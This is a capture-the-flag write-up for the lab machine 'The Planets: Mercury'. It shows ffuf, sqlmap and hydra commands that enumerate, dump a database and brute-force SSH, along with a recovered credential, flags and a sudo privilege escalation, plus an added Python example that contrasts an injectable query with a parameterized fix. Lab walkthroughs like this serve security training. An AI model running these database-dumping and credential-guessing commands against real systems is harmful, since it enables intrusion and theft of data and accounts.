Last updated: 15 Apr 24 09:31:41 (UTC)

Write-Up Mercury

Mercury

By Lawcky 14/01/24

Introduction

The First of ‘The Planets’

Difficulty: easy

Additional info:

Name: The Planets: Mercury
Release date: 4 Sep 2020
Author: SirFlash
Series: The Planets

|NOTE| The full scan outputs are not copied here, as they would be way too voluminous; click here to see them.


In this write-up

  • nmap
  • nikto
  • ffuf
  • sqlmap
  • hydra

Write-Up

FUZZING using ffuf

ffuf -w /usr/share/SecLists/Discovery/Web-Content/common.txt:FUZZ -u http://192.168.1.72:8080/FUZZ -fc 403 -e .txt,.php,.html

Nothing found, not even in the source code.


Website

On the http://192.168.1.72:8080/mercuryfacts/ page we found that there are 9 facts.
While trying different things, I found this:

293b84cd76aab5a13a26b92d695e7b2a.png

These facts are served from a SQL database.

This seems to be the SQL command that is executed:

b696bbe8d879193f2973296cb58255de.png

1df1ff871c789bdf663ad855909e59cb.png
starting to get somewhere

using sqlmap

sqlmap -u http://192.168.1.72:8080/mercuryfacts/ --dbs --batch

d0d114d38af22aa5a0007ae705bb7f6c.png

sqlmap -u http://192.168.1.72:8080/mercuryfacts/ --dump --batch

20e889c5a2bcc12f4fb83e0804790184.png

We now have different users and passwords.
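
The mercuryfacts lookup described above, as an added example (not code from the target application or from this write-up): a concatenated query next to a validated, parameterized one, plus a handler that answers bad input with a generic response. The in-memory SQLite backend, the facts table and its columns, and the function names are all assumptions made for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data; the table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE facts (id INTEGER PRIMARY KEY, fact TEXT)")
    db.executemany("INSERT INTO facts VALUES (?, ?)",
                   [(n, f"constructed fact {n}") for n in range(1, 10)])
    return db

def fact_vulnerable(db, fact_id):
    # Before: the URL segment is concatenated into the statement, so the
    # database parses whatever the client sent as part of the SQL.
    return db.execute("SELECT fact FROM facts WHERE id = " + fact_id).fetchall()

def fact_hardened(db, fact_id):
    # After, step 1: accept only a short ASCII decimal id.
    if not (fact_id.isascii() and fact_id.isdigit() and len(fact_id) <= 9):
        raise ValueError("invalid fact id")
    # After, step 2: bind the value so it can never be parsed as SQL.
    return db.execute("SELECT fact FROM facts WHERE id = ?",
                      (int(fact_id),)).fetchall()

def handle(db, path, lookup=fact_hardened):
    # Hypothetical handler for /mercuryfacts/<id>/ returning (status, body).
    prefix = "/mercuryfacts/"
    if not path.startswith(prefix):
        return 404, "not found"
    fact_id = path[len(prefix):].strip("/")
    try:
        rows = lookup(db, fact_id)
    except (ValueError, sqlite3.Error):
        # Generic answer: no SQL text or driver message reaches the client.
        return 404, "not found"
    return (200, rows[0][0]) if rows else (404, "not found")

if __name__ == "__main__":
    db = make_db()
    tampered = "1 OR 1=1"  # constructed input that is not a plain integer
    print(len(fact_vulnerable(db, tampered)))       # query structure changed
    print(handle(db, "/mercuryfacts/" + tampered))  # rejected before the query
    print(handle(db, "/mercuryfacts/3/"))
```

Binding the id closes the injection itself; the dumped table was still useful afterwards because the stored passwords were readable and one of them also worked for SSH, so password hashing and separate system credentials are the second half of the fix.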


SSH

wordlist

17f19950a37dd2b4a1e9ab62d62619d6.png

using hydra for faster testing

hydra -C mercury_users 192.168.1.72 ssh

954075fa83a2fa5726940c003145e344.png

The user webmaster works:

webmaster:mercuryisthesizeof0.056Earths

368c34531f6a75b9b5057f1b5660dc34.png

[user_flag_8339915c9a454657bd60ee58776f4ccd]

first flag found


Privilege Escalation

from webmaster to root

The sudo version is vulnerable.

sudo -V

df5a0e6722cbe6df7f24e6f031b49826.png

using this exploit

99521746feb8abb461f5eeb04e0d9899.png

fe543aa22f4140e5fd7d0654b61a9636.png
[root_flag_69426d9fda579afbffd9c2d47ca31d90]
second flag found